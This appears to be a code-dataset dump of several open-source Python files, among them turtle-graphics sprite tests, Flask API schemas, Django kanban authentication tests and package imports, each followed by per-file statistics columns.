| 115.25 | 368 | 0.722343 | 76 | 461 | 4.381579 | 0.710526 | 0.054054 | 0.084084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042079 | 0.123644 | 461 | 3 | 369 | 153.666667 | 0.782178 | 0 | 0 | 0 | 0 | 0.333333 | 0.885033 | 0.175705 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
068d8bba075e090afceada0f9363c1c0e4fec09b | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/20/8b/7e/9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.489583 | 0 | 96 | 1 | 96 | 96 | 0.40625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0698e031606ed39b0d6263bbb24356fb71c2654b | 85 | py | Python | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | 1 | 2018-09-14T11:12:21.000Z | 2018-09-14T11:12:21.000Z | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | null | null | null | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | null | null | null | from .qidian_ranking import QidianRankingSpider
from .zh_ranking import BdNovelSpider | 42.5 | 47 | 0.894118 | 10 | 85 | 7.4 | 0.7 | 0.351351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082353 | 85 | 2 | 48 | 42.5 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
06a1dabdd83c59704ad7815daa5710af46aefa1e | 31 | py | Python | cvpods/utils/metrics/__init__.py | reinforcementdriving/cvpods | 32d98b74745020be035a0e20337ad934201615c4 | [
"Apache-2.0"
] | 758 | 2021-03-11T08:14:26.000Z | 2022-03-31T07:24:13.000Z | cvpods/utils/metrics/__init__.py | wondervictor/cvpods | 614a975e5425bbaeb66bbd1ffca552d633ba89ca | [
"Apache-2.0"
] | 58 | 2020-12-04T19:47:10.000Z | 2022-03-30T06:52:13.000Z | cvpods/utils/metrics/__init__.py | wondervictor/cvpods | 614a975e5425bbaeb66bbd1ffca552d633ba89ca | [
"Apache-2.0"
] | 110 | 2021-03-18T01:59:31.000Z | 2022-03-18T21:26:56.000Z | from .accuracy import accuracy
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2334d4dcfc9dd35259d66b6d8404bce2e1862c31 | 52 | py | Python | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | 8 | 2021-12-03T10:53:27.000Z | 2022-01-11T07:01:53.000Z | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | 1 | 2022-01-28T04:00:00.000Z | 2022-01-28T04:00:00.000Z | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | null | null | null | from .gcam import GCAM
from .gcampp import GCAM_plus | 26 | 29 | 0.826923 | 9 | 52 | 4.666667 | 0.555556 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134615 | 52 | 2 | 29 | 26 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2356c9b230b92188ba4d544f99de446db4dcfaae | 10,426 | py | Python | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 3 | 2019-12-23T15:25:39.000Z | 2022-02-25T22:09:49.000Z | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 55 | 2019-12-27T14:05:02.000Z | 2020-02-01T09:53:42.000Z | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 1 | 2020-02-25T08:18:51.000Z | 2020-02-25T08:18:51.000Z | # ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
from unittest import mock
from aturtle import sprites, shapes
from . import base
from . import fake_tkinter
class UnitSquare(shapes.vector.Square):
def __init__(self, fill_color=None, line_color=None, line_width=None):
super().__init__(
side=1,
fill_color=fill_color,
line_color=line_color,
line_width=line_width,
)
class TestDefaultSprite(base.TestCase):
def setUp(self):
self.canvas = fake_tkinter.Canvas()
def test_create(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare())
def test_default_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
self.assert_almost_equal_anchor(sprite.anchor, (0, 0), places=1)
def test_default_angle(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
self.assertAlmostEqual(sprite.angle, 0, places=1)
def test_shape_fill_color_passed_to_create_polygon_fill_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(fill_color='#009fff'))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill='#009fff',
outline=mock.ANY,
width=mock.ANY,
)
def test_shape_line_color_passed_to_create_polygon_outline_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(line_color='black'))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill=mock.ANY,
outline='black',
width=mock.ANY,
)
def test_shape_line_width_passed_to_create_polygon_width_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(line_width=2))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill=mock.ANY,
outline=mock.ANY,
width=2,
)
def test_shape_coords(self):
square = UnitSquare()
sprite = sprites.VectorSprite(self.canvas, square)
expected_coords = square[0]
self.assert_almost_equal_coords(sprite.coords, expected_coords, places=1)
def test_direct_move_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_to_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
original_coords = list(sprite.coords)
sprite.direct_rotate(180)
# Half-circle rotated coords are easy to determine.
        expected_coords = original_coords[4:] + original_coords[:4]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_around_point_rotates_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(180, around=(1, 1))
self.assert_almost_equal_anchor(sprite.anchor, (2, 2), places=1)
def test_direct_rotate_around_point_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(180, around=(1, 1))
# Half-circle rotated coords around (1, 1) are these.
expected_coords = [1.5, 2.5, 1.5, 1.5, 2.5, 1.5, 2.5, 2.5]
for orig, new in zip(expected_coords, sprite.coords):
self.assertAlmostEqual(orig, new, places=5)
def test_direct_rotate_to_does_not_change_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
original_anchor = sprite.anchor
sprite.direct_rotate_to(0)
self.assert_almost_equal_anchor(original_anchor, sprite.anchor, places=1)
def test_direct_move_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(0, 10)
self.canvas.update.assert_not_called()
def test_direct_move_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(0, 10, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_move_to_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(0, 10)
self.canvas.update.assert_not_called()
def test_direct_move_to_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(0, 10, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_rotate_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(1)
self.canvas.update.assert_not_called()
def test_direct_rotate_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(1, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_rotate_to_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate_to(0)
self.canvas.update.assert_not_called()
def test_direct_rotate_to_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate_to(0, update=True)
self.canvas.update.assert_called_once_with()
def test_delete_calls_canvas_delete(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.delete()
self.canvas.delete.assert_called_once()
def test_two_deletes_only_call_canvas_delete_once(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.delete()
sprite.delete()
self.canvas.delete.assert_called_once()
class TestNonDefaultSprite(base.TestCase):
def setUp(self):
self.canvas = fake_tkinter.Canvas()
def test_custom_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
self.assert_almost_equal_anchor(sprite.anchor, (2, 1), places=1)
def test_custom_angle(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=42)
self.assertAlmostEqual(sprite.angle, 42, places=1)
def test_custom_anchor_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_custom_angle_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=180)
expected_coords = [-0.5, 0.5, -0.5, -0.5, 0.5, -0.5, 0.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(1, 0))
sprite.direct_move(1, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_to_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(5, 5))
sprite.direct_move_to(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=180)
original_coords = list(sprite.coords)
sprite.direct_rotate(180)
# Half-circle rotated coords are easy to determine.
        expected_coords = original_coords[4:] + original_coords[:4]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_around_point_rotates_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
sprite.direct_rotate(180, around=(0, 0))
self.assert_almost_equal_anchor(sprite.anchor, (-2, -1), places=1)
def test_direct_rotate_around_point_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(1, 1))
sprite.direct_rotate(180, around=(0, 0))
expected_coords = [-1.5, -0.5, -1.5, -1.5, -0.5, -1.5, -0.5, -0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_to_does_not_change_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=42)
original_anchor = sprite.anchor
sprite.direct_rotate_to(0)
self.assert_almost_equal_anchor(original_anchor, sprite.anchor, places=1)
class TestRegressionSpriteInitializedWithUpdateTrue(base.TestCase):
def test_direct_rotate_around_calls_canvas_update_once(self):
canvas = fake_tkinter.Canvas()
sprite = sprites.VectorSprite(canvas, UnitSquare(), update=True)
sprite.direct_rotate(30, around=(10, 10))
canvas.update.assert_called_once_with()
| 28.721763 | 85 | 0.643775 | 1,287 | 10,426 | 4.933955 | 0.084693 | 0.077165 | 0.133858 | 0.150709 | 0.837323 | 0.806457 | 0.794646 | 0.770394 | 0.721417 | 0.666772 | 0 | 0.031702 | 0.231537 | 10,426 | 362 | 86 | 28.801105 | 0.760859 | 0.043257 | 0 | 0.591549 | 0 | 0 | 0.002408 | 0 | 0 | 0 | 0 | 0 | 0.15493 | 1 | 0.173709 | false | 0.014085 | 0.018779 | 0 | 0.211268 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0000ac5d5f643b47d7cd69e4bbe6d86358e358b3 | 3,172 | py | Python | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
"Apache-2.0"
] | null | null | null | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
"Apache-2.0"
] | null | null | null | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
"Apache-2.0"
] | null | null | null | from app.v1 import v1_api
from flask_restplus import fields,Namespace
applications_reg = v1_api.model('applications_Reg', {
'app_name': fields.String(required=True, description='position_name'),
'created_by': fields.String(required=True, description='role_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String, description='role'),
'enabled': fields.Integer(required=True, description='enabled'),
#'created_at': fields.String(required=True, description='created_at'),
#'updated_at': fields.String(required=True, description='updated_at')
})
applications_reg_model_list = v1_api.model('applications_reg_model_list', {
#'id': fields.String(required=True, description='id'),
'app_name': fields.String(required=True, description='position_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'enabled': fields.Integer(required=True, description='enabled'),
#'created_at' : fields.String(required=True,description='created date'),
})
applications_reg_list = v1_api.model('applications_reg_list', {
'app_name': fields.String(required=True, description='position_name'),
'created_by': fields.String(required=True, description='role_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String(description='role')),
'enabled': fields.Integer(required=True, description='enabled'),
'created_at': fields.String(required=True, description='created_at'),
'updated_at': fields.String(required=True, description='updated_at')
})
update_model=v1_api.model('update_model',{
'app_name': fields.String(required=True, description='position_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String(description='role')),
})
application_updates_fields = v1_api.model('application_updates_fields', {
'_id': fields.String(required=True, description='Application'),
'update':fields.Nested(update_model)
})
registration_base_fram_model = v1_api.model('registration_base_fram_model',{
#'_id': fields.String(required=True, description='Application'),
'base64':fields.String(required=True, description='base64'),
#'enabled': fields.Integer(required=True, description='enabled'),
#'created_at' : fields.String(required=True,description='created date'),
})
update_applications_model=v1_api.model('update_applications_model',{
'enabled': fields.Integer(required=True, description='enabled'),
})
application_updates = v1_api.model('application_updates', {
'_id': fields.String(required=True, description='Application'),
'update':fields.Nested(update_applications_model)
}) | 43.452055 | 80 | 0.703342 | 364 | 3,172 | 5.898352 | 0.104396 | 0.167676 | 0.321379 | 0.27946 | 0.883093 | 0.781556 | 0.737308 | 0.691663 | 0.691663 | 0.691663 | 0 | 0.005147 | 0.142497 | 3,172 | 73 | 81 | 43.452055 | 0.784191 | 0.144704 | 0 | 0.652174 | 0 | 0 | 0.214259 | 0.046915 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
00049ff1906a28059867a3d666a74ba48a32a57e | 9,285 | py | Python | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 5 | 2021-02-17T19:45:34.000Z | 2022-02-06T12:04:46.000Z | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 1 | 2018-05-25T11:43:53.000Z | 2018-05-25T11:43:53.000Z | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 3 | 2020-06-26T09:11:24.000Z | 2021-02-17T19:45:38.000Z | from rest_framework.test import APITestCase
from rest_framework_jwt.settings import api_settings
from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from .mixins import TestDataMixin
from api.models import Board, Card, Column
class SignUpTest(APITestCase):
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def test_create_user_success(self):
data = {
'username': 'newuser',
'password': 'p@ssw0rd'
}
url = reverse('api:signup')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.filter(username='newuser').count()
self.assertEqual(user, 1)
def test_create_user_failure(self):
data = {
'username': 'newuser'
}
url = reverse('api:signup')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
user = get_user_model().objects.filter(username='newuser').count()
self.assertEqual(user, 0)
class BoardAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def test_list_unauth_user_fails(self):
url = reverse('api:board_list_create')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_unauth_user_fails(self):
data = {'name': 'new board'}
url = reverse('api:board_list_create')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_detail(self):
board = Board.objects.first()
url = reverse('api:board_detail', args=[board.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
token = self.jwt_encode_handler(payload)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_unauth_user_fails(self):
board = Board.objects.first()
num_boards = Board.objects.count()
url = reverse('api:board_detail', args=[board.id])
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(num_boards, Board.objects.count())
class ColumnAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
self.token = self.jwt_encode_handler(payload)
def test_detail(self):
column = Column.objects.first()
url = reverse('api:column_detail', args=[column.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
board = Board.objects.first()
columns = Column.objects.filter(board_id=board.id).count()
data = {
'id': -1,
'spinner': 'true',
'name': 'new column',
'position_id': columns,
'board_id': 100,
'cards': []
}
# no token included in header
url = reverse('api:columns_create_update')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid board_id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
data['board_id'] = board.id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_update(self):
first_column = Column.objects.first()
last_column = Column.objects.last()
columns = [{
'id': first_column.id,
'cards': [],
'board_id': first_column.board_id,
'name': first_column.name,
'position_id': 0
}, {
'id': last_column.id,
'cards': [],
'board_id': last_column.board_id,
'name': last_column.name,
'position_id': 2
}]
data = {'columns': columns}
# no token included in header
url = reverse('api:columns_create_update')
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid data
response = self.client.patch(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
class CardAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
self.token = self.jwt_encode_handler(payload)
def test_detail(self):
card = Card.objects.first()
url = reverse('api:card_detail', args=[card.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
column = Column.objects.first()
data = {
'id': -1,
'spinner': 'true',
'task': 'newly created test task',
'column_id': -1,
'position_id': Column.objects.count()
}
# no token included in header
url = reverse('api:cards_create_update')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid columm_id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
data['column_id'] = column.id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_update(self):
first_card = Card.objects.first()
last_card = Card.objects.last()
cards = [{
'id': first_card.id,
'task': 'column 1 card 3',
'position_id': 0,
'column_id': first_card.column_id
}, {
'id': last_card.id,
'task': 'column 1 card 1',
'position_id': 2,
'column_id': last_card.column_id
}]
data = {'cards': cards}
# no token included in header
url = reverse('api:cards_create_update')
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid data
response = self.client.patch(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 36.269531 | 77 | 0.628002 | 1,067 | 9,285 | 5.249297 | 0.102156 | 0.053562 | 0.073915 | 0.10266 | 0.806999 | 0.753437 | 0.732905 | 0.732905 | 0.732905 | 0.721121 | 0 | 0.012531 | 0.260851 | 9,285 | 255 | 78 | 36.411765 | 0.803584 | 0.023263 | 0 | 0.629032 | 0 | 0 | 0.080559 | 0.01568 | 0 | 0 | 0 | 0 | 0.139785 | 1 | 0.102151 | false | 0.005376 | 0.037634 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
001ef3521e5f8a630902035876cc0b77ee9bdab6 | 460 | py | Python | __init__.py | dimagela29/Cientista-de-dados | 056f2bb0e8d3d1b8eb3dcb8c42819b076edd2716 | [
"MIT"
] | 914 | 2017-01-21T03:07:33.000Z | 2022-02-18T10:31:51.000Z | keras_adversarial/__init__.py | tungsomot/keras-adversarial | 6651cfad771f72521c78a5cc3a23a2313efeaa88 | [
"MIT"
] | 64 | 2017-01-30T11:19:47.000Z | 2020-09-07T12:17:58.000Z | keras_adversarial/__init__.py | tungsomot/keras-adversarial | 6651cfad771f72521c78a5cc3a23a2313efeaa88 | [
"MIT"
] | 268 | 2017-01-22T13:41:22.000Z | 2022-03-30T00:59:52.000Z | from .adversarial_model import AdversarialModel
from .adversarial_optimizers import AdversarialOptimizerAlternating
from .adversarial_optimizers import AdversarialOptimizerSimultaneous, AdversarialOptimizer
from .adversarial_optimizers import AdversarialOptimizerScheduled
from .adversarial_utils import gan_targets, build_gan, normal_latent_sampling, eliminate_z, fix_names, simple_gan
from .adversarial_utils import n_choice, simple_bigan, gan_targets_hinge
| 65.714286 | 113 | 0.9 | 49 | 460 | 8.102041 | 0.530612 | 0.2267 | 0.188917 | 0.234257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 460 | 6 | 114 | 76.666667 | 0.92757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
004d2947fc9aa587e0b7d4bdcfea7dfff6349043 | 47 | py | Python | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
